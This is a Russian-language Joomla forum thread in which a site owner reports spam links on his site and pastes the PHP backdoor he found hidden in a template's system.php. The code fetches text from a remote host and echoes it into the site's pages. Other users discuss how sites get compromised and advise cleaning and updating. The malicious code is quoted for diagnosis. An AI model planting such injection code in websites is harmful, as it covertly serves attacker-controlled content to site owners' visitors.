Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 8 Ответов
  • 1494 Просмотров
*

LadaDed

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Чужие ссылки
« : 18.02.2016, 20:30:39 »
Поймал на сайте чужие ссылки.
Долго копал, не мог найти, откуда. Потом заметил, что у меня в разделе component перед жидоком стоит какой-то не понятный require_once
Он вызывает system.php (название -то какое!)
А там

Код: php
<?php
/* Это та самая блоха для Joomla, которую я поймал! */

$app=JFactory::getApplication();
$option5=$app->input->getCmd('option','');
$view5=$app->input->getCmd('view','');
$layout5=$app->input->getCmd('layout','');
$menu5=$app->getMenu();
$files = 'http://joomla.cv.ua/j32.txt';
$file_headers = @get_headers($files);
if(($menu5->getActive()==$menu5->getDefault())||($view5=='featured'))
if($file_headers[0] == 'HTTP/1.1 200 OK')
{ $content = file("http://joomla.cv.ua/j07.txt");
$data = implode($content);
echo $data; }
if(($option5=='com_content')&&($view5=='category')&&($layout5!=='blog'))
if($file_headers[0] == 'HTTP/1.1 200 OK')
{ $content = file("http://joomla.cv.ua/j08.txt");
$data = implode($content); echo $data; }
if(($option5=='com_content')&&($view5=='article'))
if($file_headers[0] == 'HTTP/1.1 200 OK')
{ $content = file("http://joomla.cv.ua/j09.txt");
$data = implode($content); echo $data; }
if(($option5=='com_content')&&($layout5=='blog'))
if($file_headers[0] == 'HTTP/1.1 200 OK')
{ $content = file("http://joomla.cv.ua/j10.txt");
$data = implode($content); echo $data; }
if (($option5=='com_content')&&($layout5=='default'))
if($file_headers[0] == 'HTTP/1.1 200 OK')
{ $content = file("http://joomla.cv.ua/j11.txt");
$data = implode($content); echo $data; }
?>

т.е. это какой-то Украинец, из Кабо Верде сидит и пишет текстовые файлы с такими вот пакостями, а они потом у меня появляются.
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Чужие ссылки
« Ответ #1 : 18.02.2016, 20:33:04 »
Взломали вас. Надо чистить сайтик. Какая версия Joomla?
*

LadaDed

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Re: Чужие ссылки
« Ответ #2 : 18.02.2016, 21:13:57 »
Да это даже не ломали, а так просетапили. Версия 2.5 28
Там на хосте нельзя установить 3 - говорят, не хватит ресурса..
А меня позвали сайт делать, когда уже все было установлено и даже начато. Вот в шаблоне ict-novotela такая бяка.
Я то искал base64_decode даже sql прочесал. Ну, нету этих текстов и все! А они, оказывается, лежат вообще на другом адресе. Найдешь их, как-же!
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Чужие ссылки
« Ответ #3 : 18.02.2016, 21:19:44 »
если 2.5.28 с последними фиксами - то дыр в ней нет (скажем так пока не нашли :) ), так что обновляться на Ж3 не очень обязательно. ну по крайней мере из-за этой причины. соответственно, либо взломали до обновления, и прост о пока не проявляли себя, либо 2.5.28, но последние фиксы безопасности не установили. тогда 2.5.28 дырявая.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

LadaDed

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Re: Чужие ссылки
« Ответ #4 : 18.02.2016, 21:34:27 »
Да, надо будет там все обновить..
Я как-то привык на Амиро все делать, Дорого, конечно, но зато все такие штуки-дрюки не моя проблема.
Если что-то глючит - в службу поддержки и пускай они там и морочатся.
Но это были интернет-магазины, потом для ресторана делал, Там народ с деньгами, Сами говорят - не надо нам экономии, надо быстро и надежно.
А тут небольшой сайтик, практически, знакомые попросили.
А скупой платит дважды.
*

SeBun

  • BanMaster
  • 4015
  • 259 / 5
  • @SeBun48
Re: Чужие ссылки
« Ответ #5 : 19.02.2016, 09:15:56 »
А скупой платит дважды.
Даже трижды.

Добавлю, что целевой взлом сайта делается крайне редко, сейчас это работает не так, как в лихих 90-х, сейчас программы ломают сайты тоннами. И ваш, скорее всего, не исключение. dmitry_stas правильно сказал, 2.5.28 вполне себе неплохая, но она редко используется в чистом виде. Обычно обвешана различными расширениями, через них и получают доступ.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Чужие ссылки
« Ответ #6 : 19.02.2016, 10:39:41 »
та там даже без сторонних расширений может быть проблема. я имел в виду, что просто установленной 2.5.28 мало для уверенности в безопасности. там было еще 2 фикса безопасности выпущено, а версия не менялась при этом, потому что фиксы были выпущены когда поддержка 2.5 уже закончилась.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

natalyaegorova

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Re: Чужие ссылки
« Ответ #7 : 03.08.2016, 00:55:15 »
Ребят, ради бога, подскажите что делать. Поймала на сайте такую же вредоносную фигню с Joomla.cv.ua!  Как от него избавиться? Сайт третьи сутки "висит"! Прописался в шаблоне в файле system.php. ДЖ версия 3.4.8.
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Чужие ссылки
« Ответ #8 : 03.08.2016, 09:50:14 »
Удалять, лечить, обновлять.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 426
Последний ответ 14.02.2024, 13:15:59
от wishlight
Непонятные ссылки в индексе Яндекс

Автор Forgiving

Ответов: 16
Просмотров: 996
Последний ответ 13.09.2021, 14:17:20
от ForQue
Вирус на сайте, генерирующий ссылки на магазин.

Автор chernykh

Ответов: 15
Просмотров: 1576
Последний ответ 23.04.2018, 21:58:08
от ProtectYourSite
Ссылки типа ?page=Igri-onlajn-na-dengi-avtomati-vulkan

Автор orkl

Ответов: 4
Просмотров: 1091
Последний ответ 13.04.2017, 20:54:51
от ProtectYourSite
Левые ссылки на сайте. Как бороться?!

Автор k.upak

Ответов: 28
Просмотров: 1501
Последний ответ 20.02.2017, 20:18:44
от flyingspook